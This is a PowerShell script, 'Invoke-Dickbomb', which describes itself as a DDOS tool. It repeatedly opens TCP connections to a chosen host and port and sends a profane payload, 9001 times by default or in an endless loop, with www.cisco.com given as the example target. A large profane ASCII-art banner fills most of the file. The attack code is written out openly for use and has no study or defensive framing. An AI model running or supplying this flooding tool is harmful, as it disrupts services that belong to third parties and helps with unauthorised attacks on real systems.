<#
.Synopsis
   Tells a service to get fucked, spams socket with dicks. 
.DESCRIPTION
   DDOS
.EXAMPLE
   Invoke-Dickbomb -target www.cisco.com -port 80
.EXAMPLE
   Another example of how to use this cmdlet
#>
    [CmdletBinding()]
    [Alias()]
    [OutputType([int])]
Param
(
    [Parameter(Mandatory=$true,
                ValueFromPipelineByPropertyName=$true,
                Position=0)]
    $target,
    $port,
    $count = 9001
)
#$DebugPreference = "Continue"

function spam-port ($target, $port){
    try{
        $dick = "GET FUCKED!!!"
        $dick += "8==========================================================================D"
        $dickbytes = [System.Text.Encoding]::ASCII.GetBytes($dick)
        $sock = New-Object Net.Sockets.TcpClient
        $sock.Connect("$target","$port")
        if ($sock.connected -eq "True") {
            Write-Debug "socket found, attempting to dickspam"
            $stream = $sock.GetStream()
            if ($stream.CanWrite -eq $True){
                $stream.Write($dickbytes, 0, ($dickbytes.Count))
                Write-Debug "dicks sent to $target : $port"
            }
    }
}
    catch {Write-Debug "unable to dickspam"}
}

write-host '
.........,,,:::::~:.,.,:~:::~~:,..,.:::~:,,,,,,::,,,,::::::::::::~::::::::~~::~:::::::::~:,,:~:~:::::::~::,.............
........,:,.  ...  .. ..      . .  ...       .. ,::::,.  ..   ..        . . .... ....  . ..  ...      .. .::,...........
........,: .     .  ~            ~.   ..    =. .,=:,    ...   ....  ....  . ..  .     ..  .,  .        .. .::...........
........,:  ,IZMM$+,7MNND8DDODNMM~MN  .?O+$NN.. ::  ...,8OII8MNZ...,$NMDI... .7ZM$+7NMO$8NM7..?7MMI$NNZ=  ..:,..........
........,:....:NM  .O   .+MM..  ~ NZ .MD... O. .    .$D=. .   +DMZ.. ZMM.  .  ,8?...7M=   I+. ..MM..  MM7  .:,..........
........,::,  ~NM.. . .. =MM .... $=. MMO  ..    .  7M .     , .MMI ..MM8 . ..NO ...7M~..  ...  MM.   MM.   :,..........
.........,:,  :NM      . =MM   .      ?NMM=.       .MN  ..      ?M8...+MM    :O.. . IM~.. I     MM . 7N=.. .:,..........
.........,:,  :NM        =MM   .      . =MMM7     ..MM.. .      :MO..  :MD.  M... . IM~ .~=     MM7$MM: .. ,~,..........
.........::,  :NM.    .  =MM         . , .~DM      .MM: ...     ?M:... .7M?.Z,   .. IM=         MM.  DMO    ,:,.........
........,~,  .:NM.  .  . =MM  ..    .= . . .N     . :MMZ .   . ,M?.      MMD+       7M=  ..+. . MM....+NZ... ,:,........
........,: . .:DM..   .  +MM .       ?Z: ,.77     ...~MMD, .  7M? .      =MM        $M+ . :Z . ,MM .   .N+ ..,:,........
........,~  .~:,,:,..  ,,,,,,, .     7,=?+.       ..... ,=??+.  ...       $,.     ,,,,,,,~I7..:,,,,,     ++. ,:,........
........,:,.    .. .....  ...........:..................,....................................,        ...... ,:,........
.........,:::,,,,,...,.  7MMMMMMMMMMMMMMMMMO,:::~~~~~~~~ZMMMMZ~~~~~~~~~~~MMMMMMMMMMMMMMMMMMMM..   ,:~::::,,,::,.........
..........,,,:::~=,  ,~  .MMMMMMMMMMMMMMMMO:~:::~~~~~~~~=MMMN~~~~~~~~~~~~OMMMMMMMMMMMMMMMMMM$. .. :~:,,,::::,,..........
................,:,   MZ..7MMMMMMMMMMMMMMM~::::~~~~~~~~=~DMM~~~=~~~~~~~~~+MMMMMMMMMMMMMMMMMZ .   ..,:,..................
...........,,,,,,:,.  OM$ .~MMMMMMMMMMMMMD,::~:~~~~~~~~~=?8==~=~~~~~~~~~~~MMMMMMMMMMMMMMMM.   +O ...:...................
.........,,::::::~~,. ?MM~  DMMMMMMMMMMMM7:::~:~~~~~~~~~~==~~~~~~~~~~~~~~=MMMMMMMMMMMMMMM~...IN:. .::...................
........,,........,....$MM$..MMMMMMMNMMMM?,::~::::~=~~~~~~~~~~~~~~~~=~~~~=NMMMMMMMMMMMMM:..+MM.,..,:,,..................
.......,:,..............MMMMZ~MMMM$:::IDMN~::::~~~~~~?~~~=~~~~~~~~:~~~~==+MMMMMMMMMMMM7,:DMMM~...,=~:,,,,,,,,...........
.......,:....7$$$I~:....$MMMMMOMMM~~$Z::OMMZ:=?7=~~==:$+~=~~~~~~~~:~~~~~ZMMMMO~~~NMMM=OMMMMMO.......,,,,,,:::,..........
.......,:,..,III$III7$?~,MMMMMMMMM~:I~7~:MM$I?MMM$~:~==I~+~~~~O+~~~~~~8MMMMM$~~~~NMMMMMMMMMM,...............,:,.........
.......,:,..,I$ZIIII7IZZ7$MMMMMMMM=:=7$O:+:~+7$ZMM8=~=~~7=~~7~~~~~~~=~=7MM8+=IIZ~NMMMMMMMM8:....,............,:,........
.......,:,...IIIIIIII7I7II$NMMMMMMI:,?::O:?:,:+I.+MM=~~~+~+7~~~=~=MMM8~~88~~O=++=MMMMMMMM$IZI?I7IIIZIIIIII...,:,........
.......,:, .,7III7II77IIIIII$MMMMM8~:?~=7II+::7$..,?M=~~~=~~~~~~8MMNMM~~?~Z8~?=~IMMMMM8$?7IZIIIIIII$IIIIII...,:,........
.......,:, ..IIIIIIIZIIIIIIIZ7NMMMN+:I:=+I=$::$$. ..ZD~~~=~=~~IDM$.~~$=~I+=+~==~OMMMN$II7II$IIIIIII7IIIIII...,:,........
.......,:. ..IIIII7I7IIIIII$IIII8MMN:::7+$~I::?7=....?8==7=~=MZ=...I7~~=~III~7~=MM7ZI?IIIII7I7III7II7IIIII...,:,........
.......,:, ..IIIII7ZIII7IIZ$II$ZIIDMM:~:$7+NI:::==,..+ZNO$ZMN$....77~~+OZ=77==+OMMMM87II7II7IIII7III7IIIII...,:,........
.......,:,..,IIIIIZ7IIIIII$II7IIINMMMM$=:7ODD:::=~~~:+I=~+~=7?=++~~~~~DM+7$?~DMMM8ZOZZ$$III7IIIIIIII7II777...,:,........
.......,:,...IIIII$I7I7II7?II7IIIZ78MMMM7:::~~:=78$ZI?+=~==?I?++IZ7=~=II+?~+MMN8$ZZOZZ$Z$7I7IIII7777ZZZZZ$...,:,........
.......,:,...II7IZIII7II7ZIIIIII7IIII7..:D?::I:::=~~=~=~~=~~~~~~~~~~=7~~~$7+~$ZZZZZOZZZZZZZZZZZZZZZ$ZZZZZZ...,:,........
.......,:,...IIII$IIIIIII7IIIIIIZI7II7...O8I:+:::=~=~~~=D~~~~~~~~=~~~7$$88~~=ZZZZZZOZZZZZZZZ$ZZZZZZZZZZZZZ...,:,........
.......,:...,I7I$IIIIII7ZIIII7II$IIII7...88ZI:+:~~=~+?=77I7?7=~~~~=~7=$8OZ~=+$ZZZZOOZ$ZZZZZOZZ$ZZZZZZZZZZZ...,:,........
.......,:,..,IIIZIIIIIIIZIIII7I77II7I7...8O8:I$::~~~~Z=::,:=Z~~=~~~=I7?8OI~~IZZZZZOOZZZZZZZOZZZZZZZZZZZZZZ...,:,........
.......,:,...ZZ$Z$$77IIIZIIIIII$IIII77,..OO8~~:~?~~~~7~I???~7~:~=+77~~OOO=~+?$ZZZZOZ$ZZZZZZOZZZZZZZ$ZZZZZZ...,:,........
.......,:....=ZOZZZZZZZZZZZZZZZOZZZZZ$~..?OOO~~+:~I+=:~=====??~?7+~~~78OO~=~?~$$ZZOZ$ZZZZZZOZZZZZZZZZZZZZZ...,:,........
.......,:,.....:$ZZZZZZZZZZZZZZOZZ$I~.+...OO8I~~7~~=$~~~II?~??+I=:?+=8OOI~~=ZZZZZZZZZZZZZZZOZZZZZZ$ZZZZZ$$...,:,........
.......,:,...?....?$ZZZZZZZZZZ=,..~=:.~=..+OOOO7~ZI~~$7I~~~=I+~:7I7888$Z=+?I7$ZZZ=?$ZZZZZZOO$ZZZZ$ZZ$$7?=~...,:,........
.......,:,...OO8?~~~=$$OZ$Z?.,=~......=?....I8OO8OOZZZ7I?++IIIODNNNND=?+~IIIII~~??$II$ZZZZOZZ$ZZ$?=~~~~~~=...,:,........
.......,:,...8OOO87+~~=I7.,=,......,~~~~=,..:~=+ZOZZZZZZOO8O~=??N88O=+II=???I+~~+I~~?$$ZZ$OZ?~~==~~=+?=:.....,:,........
.......,:,...OOOOOO87~=:?=~=.....:==~~~=~=++~~~~~=77$$$ZZZ===~=+7===?$~+++~==$II??~~=7$ZZ?~=~~~~~IO8...... ..:,.........
.......,:,...OOOOOOOOO+~~?:~..  ~=~~~~~~~~~~~=+?+777777$I+==+??ININM?NI?=+???I?+I+III??=?~~~7O888O87......,::,..........
.......,:,...OOOOOOOOOOO==++..,:~~~~~~~~~~~~~~=~=I7777III+7?I~+?NMO87O:?.,7???~7=~=~++?~$88O888OO8I...,:~:,,............
.......,:,...OOOOOOOOOOOO=.+,.:~~~~~~~~~~~~~~~~~77777777=+===+~=77...=.~.,??I,?+~:,:??DZ=8OOOOO888=.. ,:,...............
.......,:,...OOOOOOOOOOOO7.,+.:~~~~~~~~~~~~~~~=++$7I77I$~=I7?7=+.+...+...::?,:=?+I+$?78ZOOOOOOOOOOZ. .,:,...............
.......,:,...OOOOOOOOOOOO8~.=.~~~~~~~~~~~~=~=~+?I?+I77$7~7++=~?......+.,..:,==I7?~+O8=OOOOOOOOOOOO8+. .::...............
.......,:,...OOOOOOOOOOOOO7~.::~~~~~~~~~~I=?=~?~7?+++7=?+I?=+?=.=~=...~+. ~+:==?+=8OZOOOOOOOOOOOOOOO.. ,:,..............
.......,:, ..OOOOOOOOOOOO8O~:~,=~=~~~~~~~~~~~===7??++7~?:?~=?,,. ?,..:??~.==::::+ZOOOOOOOOOOOOOOOOO8....:,..............
.......,:, ..OOOOOOOOOOOOO87=.~:~~~=~~~~~~~~~=~~????+7II=+~~? ,+ .=,.:. ..,:::::?8OOOOOOOOOOOOOOOOOO,.  :,..............
.......,:, ..OOOOOOOOOOOOO=.,+.,+~=~~~~~~~~~~==:+=II8~=~~I==+.+,.,. .: ...,::::,8OOOOOOOOOOOOOOOOOOO=. .:,..............
.......,:,...OOOOOOOOOOO8?..+=:+.~=~~~==~~~+II+I+DDDMD,=~I=~,  , , .    ...,::,~OOOOOOOOOOOOOOOOOOOO~  .:,..............
.......,:,...OOOOOOOOO88.....~,.~:..+=~~=~?=~?=?OMMMD+MM8~==?.... .     ....:::?+~?$88OOOOOOOOOOOOO8.  .:,..............
.......,:,...OO8OO88OO8O.....+....+=:~+???I+~I~~=$MN=?=~?+Z+II..        ....:,+:::::,=ZOOOOOOOOOOOO8.. .:,..............
.......,:,...OOOOOOOOOI,......+.....~====~==+~I+=7$$$Z$Z$ZII=~=....... .....:~::::::::::+8OOOOOOOOOZ...,:,..............
.......,:,...OOOOOOOOO~.......:?....=~~~~~~~I=ZZ$Z$Z?++=?IZ$$ZZ$............:::::::::::::OO88OOOOO8:. ,::,..............
.......,:,...OOOOOOOOO=.........+...~~~~~~+?+ZZZZ$Z$ZZZIO$ZZ$$Z$$,...........,::::::::,::7OOO8OOOO=...,~~:::,...........
.......,:,...OOOOOOOOO+.........8:..~~=~~~I=$$ZZZZZZZZ$$ZZZZZZZZZ$I,........,:::::::::,,:IOOO8OOOO....,,,,,::,..........
........:,...?????????.........II7:.,::,,:~:?II???+++??+++++++++????.:~~....,,,,,,,,,,,,,+???I????.. ........:,,........
........:........~I$$+,,..... ....:+77+~............~I77+,.........,.,?7$I:,........,:=~.....,::=......,,~...,:,........
........:~.....=Z?,,=OOZ~.......,ZI~,~ZOO:........+OI,,~OO+,........I$:,:7OO+.......OOO=.....$OO7.....+OOZ...,:,........
........:,...:ZO:....,ZOO~.....=O~.....:OO~......Z$:.....ZZO:.....+O7.....=OZ$......ZO7,.....7OO~.....=OOI...::,........
.......,:....OZ8......?OOO....$OZ.......7OOI. ..ZO,.......OOZ....~OO.......,ZO+.....ZO=......?OO,.....~ZO~...:,.........
.......,:,...OOO......:ZOO...:OO+.......,OOO...~ZO........ZOO=...ZOZ........ZOO~....$O,......+OO.. ...:ZO,...:,.........
.......,:,...ZZO~.....~OOZ...?OO~........OOZ...IOZ........7OOI..,OO$..  ....$OO+....7O.......=OZ......,$O....:,.........
........:,...,ZOO7,...IOZ+...$OO~........OOO,.:ZOZ........+ZO7..:OOZ........IOO?....IO.......~OI......,7Z.. ,:,.........
........,:,.....,,:,..OOZ....ZOO=........8OO..:OOO........+OO+..:OOZ........?OZ~....?7.......:O~......,7I...::..........
.........,::......,..IZO.....?OO$.......,ZO$..,IOO,.......IOO,..,OZZ........$OI.....?+.......:$,.......I~...::..........
..........,:::,.....,OZ~.....:OOO.......,OZ:...~ZO~.......OOZ....ZOO:.......OO,.....:........,:........:....,:..........
............,~:.....O7........$OO?......$Z......$OO+,....~ZO.....:OOZ......~O~.......,........,,........,....:,.........
............,:....I8+....,~,...,ZO7~,.~$7........?OOI,..=Z:... ...:?OO:..,ZO,......,OO:......OOO......$OO:...:,,........
............:,...Z=.....,~~:......:~+~......,.......:==~... ..,,.....,=++,.... .....~,.......~:,......~=:....:,.........
'

write-host "Sending dicks to $target : $port"

# Send over 9001 dicks
1..$count | %{
    spam-port -target $target -port $port
}
# Alternatively;
# while ($true) {spam-port -target $target -dport $dport}
